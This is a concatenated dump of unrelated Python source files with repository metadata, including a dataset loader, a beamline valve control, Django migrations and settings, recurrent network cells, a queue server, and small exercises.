y_test = [wnid_to_label[img_file_to_wnid[img_file]] for img_file in img_files]
y_test = np.array(y_test)
mean_image = X_train.mean(axis=0)
if subtract_mean:
X_train -= mean_image[None]
X_val -= mean_image[None]
X_test -= mean_image[None]
return {
'class_names': class_names,
'X_train': X_train,
'y_train': y_train,
'X_val': X_val,
'y_val': y_val,
'X_test': X_test,
'y_test': y_test,
'class_names': class_names,
'mean_image': mean_image,
}
data = load_tiny_imagenet('/content/tiny-imagenet-200/', dtype=np.float32, subtract_mean=True)
|
[
"[email protected]"
] | |
09c006664cf108d6ae9fc0f41fcb8e22fcea4877
|
a9e60d0e5b3b5062a81da96be2d9c748a96ffca7
|
/configurations/i21-config/scripts/functions/sample_vessel_vacuum_control.py
|
055be6350f0c567e280cfe42194b79f557165ef8
|
[] |
no_license
|
openGDA/gda-diamond
|
3736718596f47607335ada470d06148d7b57526e
|
bbb64dcfd581c30eddb210c647db5b5864b59166
|
refs/heads/master
| 2023-08-16T08:01:11.075927 | 2023-08-15T16:01:52 | 2023-08-15T16:01:52 | 121,757,699 | 4 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,543 |
py
|
'''
define function to control the sample vessel vacuum valves for sample changes
Created on 18 Jul 2023
@author: fy65
'''
import installation
from gda.device.scannable import ScannableMotionBase
from gda.epics import CAClient
# control PV = BL21I-EA-SMPL-01:SEQ:CTRL
# state PV = BL21I-EA-SMPL-01:SEQ:CTRL:STATE_RBV
class SampleVesselValvesControl(ScannableMotionBase):
def __init__(self, name, pv):
self.setName(name)
self.setInputNames([name])
self.setOutputFormat(["%d"])
self.control = CAClient(pv)
self.state = CAClient(pv + ":STATE_RBV")
self.control.configure()
self.state.configure()
self.val = 0
def getPosition(self):
if installation.isLive():
return int(self.control.get()) #0 - Close, 1 - Open
if installation.isDummy():
return self.val
def asynchronousMoveTo(self, val):
if installation.isLive():
self.control.caput(int(val))
if installation.isDummy():
self.val = val
if val == 1:
print("Open sample vessel valves")
if val == 0:
print("Close sample vessel valves")
def isBusy(self):
if installation.isLive():
return int(self.state.caget()) != 2 #2 - Ready, 1 - Opening, 0 - Closing
if installation.isDummy():
return False
sample_vessel_valves = SampleVesselValvesControl("sample_vessel_valves", "BL21I-EA-SMPL-01:SEQ:CTRL")
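# Illustrative usage sketch (an assumption added for clarity; in GDA this scannable
# would normally be driven from the Jython console rather than from this module):
#   sample_vessel_valves.asynchronousMoveTo(1)   # 1 - open the sample vessel valves
#   sample_vessel_valves.asynchronousMoveTo(0)   # 0 - close the sample vessel valves
#   sample_vessel_valves.getPosition()           # read back the current valve state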
|
[
"[email protected]"
] | |
2f9db9f890c9233e5af1669088468a7683d1af35
|
0fb3b73f8e6bb9e931afe4dcfd5cdf4ba888d664
|
/awssam/fullfeblog/blog/migrations/0002_auto_20201208_1414.py
|
b61387acb7dcbe792fb0d7d8887e97d528f46789
|
[] |
no_license
|
mrpal39/ev_code
|
6c56b1a4412503604260b3346a04ef53a2ba8bf2
|
ffa0cf482fa8604b2121957b7b1d68ba63b89522
|
refs/heads/master
| 2023-03-24T03:43:56.778039 | 2021-03-08T17:48:39 | 2021-03-08T17:48:39 | 345,743,264 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,023 |
py
|
# Generated by Django 3.1.4 on 2020-12-08 14:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='post',
options={'ordering': ('-publish',)},
),
migrations.RenameField(
model_name='post',
old_name='content',
new_name='body',
),
migrations.RenameField(
model_name='post',
old_name='date_posted',
new_name='publish',
),
migrations.AddField(
model_name='post',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='slug',
field=models.SlugField(default=django.utils.timezone.now, max_length=250, unique_for_date='publish'),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='status',
field=models.CharField(choices=[('draft', 'Draft'), ('published', 'Published')], default='draft', max_length=10),
),
migrations.AddField(
model_name='post',
name='updated',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='post',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blog_posts', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='post',
name='title',
field=models.CharField(max_length=250),
),
]
|
[
"[email protected]"
] | |
5d911f4022457d7e47942adf723047dc59cefa2f
|
4a5f3b26fca176a80ca8eca796bc646bb225b017
|
/attentive-reader-2/sgu.py
|
8ddc21a3a0732b54672764fcd0003dcc2dec4e7a
|
[] |
no_license
|
musyoku/NLP
|
9a63dc882b07b017f7cfc72d863c4d9e5cbeff5e
|
9b040bb960b65fb2a1c330adafa6c52e3284a0c1
|
refs/heads/master
| 2021-01-21T04:53:57.029200 | 2016-07-10T17:08:03 | 2016-07-10T17:08:03 | 55,848,677 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,107 |
py
|
import numpy
import chainer
from chainer import cuda
from chainer.functions.activation import sigmoid
from chainer.functions.activation import softplus
from chainer.functions.activation import tanh
from chainer.functions.math import clip
from chainer import link
from chainer.links.connection import linear
from chainer import variable
def hard_sigmoid(x):
return clip.clip(x * 0.2 + 0.5, 0.0, 1.0)
class SGU(link.Chain):
def __init__(self, in_size, out_size):
super(SGU, self).__init__(
W_xh=linear.Linear(in_size, out_size),
W_zxh=linear.Linear(out_size, out_size),
W_xz=linear.Linear(in_size, out_size),
W_hz=linear.Linear(out_size, out_size),
)
def __call__(self, h, x):
x_g = self.W_xh(x)
z_g = tanh.tanh(self.W_zxh(x_g * h))
z_out = softplus.softplus(z_g * h)
z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
h_t = (1 - z_t) * h + z_t * z_out
return h_t
class StatefulSGU(SGU):
def __init__(self, in_size, out_size):
super(StatefulSGU, self).__init__(in_size, out_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(StatefulSGU, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
def to_gpu(self, device=None):
super(StatefulSGU, self).to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h):
assert isinstance(h, chainer.Variable)
h_ = h
if self.xp == numpy:
h_.to_cpu()
else:
h_.to_gpu()
self.h = h_
def reset_state(self):
self.h = None
def __call__(self, x):
if self.h is None:
xp = cuda.get_array_module(x)
zero = variable.Variable(xp.zeros_like(x.data))
z_out = softplus.softplus(zero)
z_t = hard_sigmoid(self.W_xz(x))
h_t = z_t * z_out
else:
h_t = SGU.__call__(self, self.h, x)
self.h = h_t
return h_t
class DSGU(link.Chain):
def __init__(self, in_size, out_size):
super(DSGU, self).__init__(
W_xh=linear.Linear(in_size, out_size),
W_zxh=linear.Linear(out_size, out_size),
W_go=linear.Linear(out_size, out_size),
W_xz=linear.Linear(in_size, out_size),
W_hz=linear.Linear(out_size, out_size),
)
def __call__(self, h, x):
x_g = self.W_xh(x)
z_g = tanh.tanh(self.W_zxh(x_g * h))
z_out = sigmoid.sigmoid(self.W_go(z_g * h))
z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
h_t = (1 - z_t) * h + z_t * z_out
return h_t
class StatefulDSGU(DSGU):
def __init__(self, in_size, out_size):
super(StatefulDSGU, self).__init__(in_size, out_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(StatefulDSGU, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
def to_gpu(self, device=None):
super(StatefulDSGU, self).to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h):
assert isinstance(h, chainer.Variable)
h_ = h
if self.xp == numpy:
h_.to_cpu()
else:
h_.to_gpu()
self.h = h_
def reset_state(self):
self.h = None
def __call__(self, x):
if self.h is None:
z_t = hard_sigmoid(self.W_xz(x))
h_t = z_t * 0.5
else:
h_t = DSGU.__call__(self, self.h, x)
self.h = h_t
return h_t
|
[
"[email protected]"
] | |
2908f0e3db2a300277114b39d46d25d3ea5e1012
|
2d3976964d8923a1e91e31af702bd68fbf37d474
|
/runTask/server.py
|
1bd36c0754e0d042ad090870e35b568521b7c88d
|
[] |
no_license
|
barry800414/master_thesis
|
2f6900fb2964891849dadef9283ed6e7f11cc696
|
01a0cac30ab63fcf818f1f43959634094b624af5
|
refs/heads/master
| 2020-05-29T08:53:32.810702 | 2016-06-04T02:03:52 | 2016-06-04T02:03:52 | 38,382,667 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 609 |
py
|
#!/usr/bin/env python3
from multiprocessing.managers import BaseManager
import queue
import sys
if __name__ == '__main__':
port = 3333
if len(sys.argv) == 2:
port = int(sys.argv[1])
q = queue.Queue()
# a QueueManager hold a queue q, which automatically handle race condition
class QueueManager(BaseManager):
pass
QueueManager.register('get_queue', callable = lambda: q)
m = QueueManager(address = ('0.0.0.0', port), authkey = b'barry800414')
s = m.get_server()
print('Server is running now (port:%d) ...' % (port), file=sys.stderr)
s.serve_forever()
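# Illustrative client-side sketch (comments only; an assumption added for clarity,
# not part of this server script). A worker on another host can attach to the same
# shared queue like this:
#   from multiprocessing.managers import BaseManager
#   class QueueManager(BaseManager):
#       pass
#   QueueManager.register('get_queue')
#   m = QueueManager(address=('server-host', 3333), authkey=b'barry800414')
#   m.connect()
#   q = m.get_queue()
#   q.put('a task')   # producers put tasks; consumers call q.get()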
|
[
"[email protected]"
] | |
f50f22f4257ef2bd4b135c4c4b543869c019f8b8
|
4eeb40dcc265caf4a2b84bc90a28d481930d6a8a
|
/cssproject/cssproject/wsgi.py
|
e87cec6d202682e65310c1cd76e7ac0245d43209
|
[] |
no_license
|
mprasu/Sample-Projects
|
eb7fc46e81b09d7c97c238047e3c93b6fff3fb8d
|
7363baf630900ab2babb4af2afe77911d8a548b2
|
refs/heads/master
| 2020-04-16T06:43:16.345750 | 2019-01-12T07:07:34 | 2019-01-12T07:07:34 | 165,358,055 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 397 |
py
|
"""
WSGI config for cssproject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cssproject.settings")
application = get_wsgi_application()
|
[
"[email protected]"
] | |
ddbeff68f2104fbd657620867d9acc172c5adecb
|
3af6960c805e9903eb27c09d8bc7ebc77f5928fe
|
/problems/0190_Reverse_Bits/__init__.py
|
13d13496fce71652ff8239e68ab130a72e9cc66e
|
[] |
no_license
|
romain-li/leetcode
|
b3c8d9d4473eebd039af16ad2d4d99abc2768bdd
|
5e82b69bd041c2c168d75cb9179a8cbd7bf0173e
|
refs/heads/master
| 2020-06-04T20:05:03.592558 | 2015-06-08T18:05:03 | 2015-06-08T18:05:03 | 27,431,664 | 2 | 1 | null | 2015-06-08T18:05:04 | 2014-12-02T12:31:58 |
Python
|
UTF-8
|
Python
| false | false | 656 |
py
|
ID = '190'
TITLE = 'Reverse Bits'
DIFFICULTY = 'Easy'
URL = 'https://oj.leetcode.com/problems/reverse-bits/'
BOOK = False
PROBLEM = r"""Reverse bits of a given 32 bits unsigned integer.
For example, given input 43261596 (represented in binary as
**00000010100101000001111010011100**), return 964176192 (represented in binary
as **00111001011110000010100101000000**).
**Follow up**:
If this function is called many times, how would you optimize it?
Related problem: [Reverse Integer](/problems/reverse-integer/)
**Credits:**
Special thanks to [@ts](https://oj.leetcode.com/discuss/user/ts) for adding
this problem and creating all test cases.
"""
|
[
"[email protected]"
] | |
0da90c73bc71313602b59d4b1cce999930cd4017
|
637669abf38aa06d786458bcb552d0d5dc188302
|
/claripy/ast/__init__.py
|
2da826a5b43d467502f3d34eadb856d283ede3f4
|
[
"BSD-2-Clause"
] |
permissive
|
angr/claripy
|
c5603b52f829a9b29630ed6665ab7ec294cb8157
|
b35449fecd129dc46a0cabdd6499354e89b38a68
|
refs/heads/master
| 2023-09-05T18:48:19.736126 | 2023-09-05T17:17:45 | 2023-09-05T17:17:45 | 40,328,505 | 260 | 115 |
BSD-2-Clause
| 2023-09-11T22:09:06 | 2015-08-06T21:50:19 |
Python
|
UTF-8
|
Python
| false | false | 1,376 |
py
|
# pylint:disable=redefined-outer-name
from typing import TYPE_CHECKING
# Mypy is severely confused by this delayed import trickery, but works if we just pretend that the import
# happens here already
if TYPE_CHECKING:
from .bits import Bits
from .bv import BV
from .vs import VS
from .fp import FP
from .bool import Bool, true, false
from .int import Int
from .base import Base
from .strings import String
from .. import ops as all_operations
else:
Bits = lambda *args, **kwargs: None
BV = lambda *args, **kwargs: None
VS = lambda *args, **kwargs: None
FP = lambda *args, **kwargs: None
Bool = lambda *args, **kwargs: None
Int = lambda *args, **kwargs: None
Base = lambda *args, **kwargs: None
true = lambda *args, **kwargs: None
false = lambda *args, **kwargs: None
String = lambda *args, **kwargs: None
all_operations = None
def _import():
global Bits, BV, VS, FP, Bool, Int, Base, String, true, false, all_operations
from .bits import Bits
from .bv import BV
from .vs import VS
from .fp import FP
from .bool import Bool, true, false
from .int import Int
from .base import Base
from .strings import String
from .. import ops as all_operations
__all__ = ("Bits", "BV", "VS", "FP", "Bool", "true", "false", "Int", "Base", "String", "all_operations")
|
[
"[email protected]"
] | |
5d8cfdb679b337f26330b1c109a88a1680180caf
|
d569476dd95496339c34b231621ff1f5dfd7fe49
|
/PyTest/SteamSender/tests/test_send_cards.py
|
996577a1586476bfeec33e7f74f1ba41cfd2b17e
|
[] |
no_license
|
monteua/Tests
|
10f21f9bae027ce1763c73e2ea7edaf436140eae
|
553e5f644466683046ea180422727ccb37967b98
|
refs/heads/master
| 2021-01-23T10:28:49.654273 | 2018-05-09T09:11:30 | 2018-05-09T09:11:30 | 93,061,159 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 494 |
py
|
from PageObject.SteamActions import SteamHome
from accounts import accounts
accounts_list = accounts()
def test_send_trade(driver):
for login in accounts_list:
if login == 'monte_ua13':
password = ""
else:
password = ""
SteamHome(driver).open_browser()
SteamHome(driver).enter_credentials(login, password)
SteamHome(driver).pass_steam_guard()
SteamHome(driver).open_trade_url()
SteamHome(driver).log_off()
|
[
"[email protected]"
] | |
4770757cc653f027b500d6f75168f8318a702d86
|
7f2612e5132e1583e5ba9758f299a8f301f0dc70
|
/FB/5-longest-palindromic-substring.py
|
fb44ee0f8a6db9b0e87b7abf9cf4a48bd884a73a
|
[] |
no_license
|
taeheechoi/coding-practice
|
380e263a26ed4de9e542c51e3baa54315127ae4f
|
9528b5e85b0ea2960c994ffea62b5be86481dc38
|
refs/heads/main
| 2022-07-09T11:22:18.619712 | 2022-06-28T14:55:51 | 2022-06-28T14:55:51 | 447,082,854 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 426 |
py
|
class Solution:
# Time O(N^2) Space O(1)
def longestPalindrome(self, s):
res = ''
for i in range(len(s)):
odd = self.is_pal(s, i, i)
even = self.is_pal(s, i, i+1)
res = max(odd, even, res, key=len)
return res
def is_pal(self, s, l, r):
while l >= 0 and r < len(s) and s[l] == s[r]:
l -= 1
r += 1
return s[l+1: r]
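# Illustrative usage sketch (added for clarity; not part of the original file).
if __name__ == "__main__":
    print(Solution().longestPalindrome("babad"))  # "bab" or "aba" -- both are valid longest palindromes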
|
[
"[email protected]"
] | |
d3b5e095fa1dab8e9c98895fa11a48312d856b56
|
874f46f4510b321ec3110ac8d5d5e572175c5544
|
/Generator_Tests/TestFrec/scripts/generator.py
|
94df7463f40e16990b3f6614572ff87accc2eb5a
|
[] |
no_license
|
JordiEspinozaMendoza/Simulacion
|
bb271aee0908693ff0e36470dae98216096d9066
|
fac1cdf5010a34a853a8b13d93209bcbde616e64
|
refs/heads/main
| 2023-05-31T14:06:21.329271 | 2021-06-14T02:52:06 | 2021-06-14T02:52:06 | 367,148,203 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,014 |
py
|
import sys
import os
import pandas as pd
sys.setrecursionlimit(5000)
# X = seed
# a = multiplier
# c = additive constant
# m = modulus
def Operacion(X, a, c, m):
Resi = ((a*X)+c) % m
return Resi
def createDataFrame(data):
df = pd.DataFrame(data, columns=["n","Xn","Xn+1","Rn"])
cols = list(df.columns)
return df.to_string(), df, cols
def Recursivo(X0, a, c, m, conta, Detener, ArraySemilla, data):
try:
for Semilla in ArraySemilla:
if X0==Semilla:
Detener = True
if Detener==True or conta==325:
pass
else:
data["n"].append(conta+1)
data["Xn"].append(X0)
data["Xn+1"].append(Operacion(X0,a,c,m))
data["Rn"].append(Operacion(X0,a,c,m)/m)
conta = conta + 1
ArraySemilla.append(X0)
Recursivo(Operacion(X0,a,c,m),a,c,m,conta,Detener, ArraySemilla, data)
except Exception as e:
print(str(e))
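# Illustrative usage sketch (an assumption, not part of the original script): run the
# linear congruential recurrence above with a small modulus and print the table.
if __name__ == "__main__":
    demo = {"n": [], "Xn": [], "Xn+1": [], "Rn": []}
    Recursivo(7, 5, 3, 16, 0, False, [], demo)  # seed=7, a=5, c=3, m=16
    print(createDataFrame(demo)[0])  # first element is the DataFrame rendered as a string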
|
[
"[email protected]"
] | |
ce65095ee46c58e871cd6b80c4cfe769ace6e7a1
|
f5f7f8d12956e4bff6e1c5f6fab10b006690f195
|
/luffy/settings.py
|
fe7c34ae1af2839496be8ef590c0c49e0a16121b
|
[] |
no_license
|
chenrun666/luffy
|
1fbee911d1d7f86e5c7b1ed7f47e84f6f1ee9846
|
59f6229e16978ab9c40ef948807c717c2cddaea9
|
refs/heads/master
| 2020-04-07T16:09:20.306754 | 2018-11-21T08:45:29 | 2018-11-21T08:45:29 | 158,517,404 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,582 |
py
|
"""
Django settings for luffy project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'h*zthsj)s$^_5kxkdbk+^gy2ih+vh6kpw#wu$uy^0bce((+k)9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'course.apps.CourseConfig',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'course.mymiddleware.accessmiddleware.CrossDomainMiddleWare',
]
ROOT_URLCONF = 'luffy.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'luffy.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
"CONNECTION_POOL_KWARGS": {"max_connections": 100}
# "PASSWORD": "密码",
}
}
}
|
[
"[email protected]"
] | |
23fbea60c2bea452a414dcf5f255cd4eabdab38a
|
437e905d8c214dc25c559b1dc03eaf9f0c85326f
|
/is28/vyacheslavleva28/lab6/function.py
|
1522faa137dc1fcb8f84d4cc4b96a551fd47870d
|
[] |
no_license
|
AnatolyDomrachev/karantin
|
542ca22c275e39ef3491b1c0d9838e922423b5a9
|
0d9f60207e80305eb713fd43774e911fdbb9fbad
|
refs/heads/master
| 2021-03-29T03:42:43.954727 | 2020-05-27T13:24:36 | 2020-05-27T13:24:36 | 247,916,390 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 364 |
py
|
def vvod():
a = []
for i in range(10):
x = float(input())
a.append(x)
return a
def rachet(a):
res = True
for i in range(0,len(a)-1):
if a[i]> a[i+1]:
res = False
return res
def vyvod(data):
    print(data)
data = vvod()
print(data)
result = rachet(data)
print(result)
vyvod(result)
print(vyvod)
|
[
"[email protected]"
] | |
06aae58ab947c90ed7bc942a02ffa420afd0287b
|
7bededcada9271d92f34da6dae7088f3faf61c02
|
/pypureclient/flashblade/FB_2_6/models/network_interface_trace_get_response.py
|
711d740178ee303c6379e1c1ec389c67bd15cca7
|
[
"BSD-2-Clause"
] |
permissive
|
PureStorage-OpenConnect/py-pure-client
|
a5348c6a153f8c809d6e3cf734d95d6946c5f659
|
7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e
|
refs/heads/master
| 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 |
BSD-2-Clause
| 2023-09-08T09:08:30 | 2018-12-04T17:02:51 |
Python
|
UTF-8
|
Python
| false | false | 4,335 |
py
|
# coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.6, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.6
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flashblade.FB_2_6 import models
class NetworkInterfaceTraceGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'continuation_token': 'str',
'total_item_count': 'int',
'items': 'list[NetworkInterfaceTrace]'
}
attribute_map = {
'continuation_token': 'continuation_token',
'total_item_count': 'total_item_count',
'items': 'items'
}
required_args = {
}
def __init__(
self,
continuation_token=None, # type: str
total_item_count=None, # type: int
items=None, # type: List[models.NetworkInterfaceTrace]
):
"""
Keyword args:
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the `continuation_token` to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The `continuation_token` is generated if the `limit` is less than the remaining number of items, and the default sort is used (no sort is specified).
total_item_count (int): Total number of items after applying `filter` params.
items (list[NetworkInterfaceTrace]): A list of network trace run result.
"""
if continuation_token is not None:
self.continuation_token = continuation_token
if total_item_count is not None:
self.total_item_count = total_item_count
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `NetworkInterfaceTraceGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
return None
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(NetworkInterfaceTraceGetResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NetworkInterfaceTraceGetResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"[email protected]"
] | |
b9b22ed2ac4565940e04c8fac0f36e72bf88ef75
|
eb61d62ca1f6f0123e3771105f5dfbbd6115138d
|
/.history/23-08-21_20210912011408.py
|
d242edf35564cc66ff35c5dd66a540fa6f9fc0b8
|
[] |
no_license
|
Alopezm5/CORRECTO-2
|
e0f14bcc3a88c0e222d10e3261e68532008bc42e
|
223613f1fb04dce3fac9f82f243cb2f22fe100f3
|
refs/heads/main
| 2023-07-29T06:52:48.147424 | 2021-09-12T20:33:27 | 2021-09-12T20:33:27 | 388,995,308 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,944 |
py
|
class Empresa:
def __init__(self,nom="El mas barato",ruc="0999999999",tel="042971234",dir="Juan Montalvo"):
self.nombre=nom
self.ruc=ruc
self.telefono=tel
self.direccion=dir
def mostrarEmpresa(self):
print("Empresa: {:17}, RUC: {}".format(self.nombre,self.ruc))
class Cliente:
def __init__(self,nom,ced,tel):
self.nombre=nom
self.cedula=ced
self.telefono=tel
def mostrarCliente(self):
print(self.nombre,self.cedula,self.telefono)
class ClienteCorporativo(Cliente):
def __init__(self,nomb,cedu,telecontrato):
super().__init__(nomb,cedu,tele,contrato)
self.__contrato=contrato
@property
def contrato(self): #getter: obtener el valor del atributo privado
return self.__contrato
@contrato.setter
def contrato(self,value): #setter: asigna el valor del atributo privado
if value:
self.__contrato=value
else:
self.__contrato="Sin contrato"
def mostrarCliente(self):
print(self.nombre, self.__contrato)
class ClientePersonal(Cliente):
def __init__(self,nom,ced,tel,promocion=True):
super().__init__(nom,ced,tel,)
self.__promocion=promocion
@property
def promocion(self): #getter: obtener el valor del atributo privado
return self.__promocion
def mostrarCliente(self):
print(self.nombre, self.__promocion)
class Articulo:
secuencia=0
iva=0.12
def __init__(self,des,pre,sto):
Articulo.secuencia+=1
self.codigo=Articulo.secuencia
self.descripcion= des
self.precio=pre
self.stock=sto
    def mostraArticulo(self):
        print(self.codigo,self.descripcion)
class DetVenta:
linea=0
def __init__(self,articulo,cantidad):
DetVenta.linea+=1
self.lineaDetalle=DetVenta.linea
self.articulo=articulo
self.precio=articulo.precio
self.cantidad=cantidad
class CabVenta:
def __init__(self,fac,empresa,fecha,cliente,tot=0):
self.empresa=empresa
self.factura=fac
self.fecha=fecha
self.cliente=cliente
self.total=tot
self.detalleVen=[]
def agregarDetalle(self,articulo,cantidad):
detalle=DetVenta(articulo,cantidad)
self.total+=detalle.precio*detalle.cantidad
self.detalleVen.append(detalle)
    def mostrarVenta(self,empNombre,empRuc):
        print("Empresa: {:17}, RUC: {}".format(empNombre,empRuc))
# emp=Empresa("El mas barato","0953156049","0998132446","Coop. Juan Montalvo")
# emp.mostrarEmpresa()
# print(emp.nombre)
cli1=ClientePersonal("Jose","0912231499","042567890",True)
cli1.mostrarCliente()
art1=Articulo("Aceite",2,100)
art1.mostraArticulo()
art2=Articulo("Coca Cola",1,200)
art2.mostraArticulo()
art3=Articulo("Leche",1.5,200)
art3.mostraArticulo()
print(Articulo.iva)
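# Brief illustration added for this edit (not part of the original exercise; the
# sample values below are made up): assigning an empty value through the
# contrato setter falls back to "Sin contrato".
cli2=ClienteCorporativo("Ana","0911111111","042000000","Contrato basico")
cli2.contrato=""
cli2.mostrarCliente() # prints: Ana Sin contrato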
|
[
"[email protected]"
] | |
e7a3ca9fa15a77897aa6fde5e7b69ee9bb2f853d
|
ac350894488b34318c11a65d35a0f8fdf69b7d50
|
/products/migrations/0001_initial.py
|
545343aa9abd1f1393c114e71c6c8e1aed73463f
|
[] |
no_license
|
phrac/onemgin
|
508f052304ddbc03f45e994ebe33769ae30d9336
|
7a029dbca1bd2725ceabc0741c7cfb47290aadb7
|
refs/heads/master
| 2021-01-16T19:31:10.929508 | 2015-09-08T23:53:43 | 2015-09-08T23:53:43 | 12,391,387 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,083 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Barcode',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('image', models.FileField(null=True, upload_to=b'barcodes/ean13/')),
],
),
migrations.CreateModel(
name='BarcodeType',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=32)),
],
),
migrations.CreateModel(
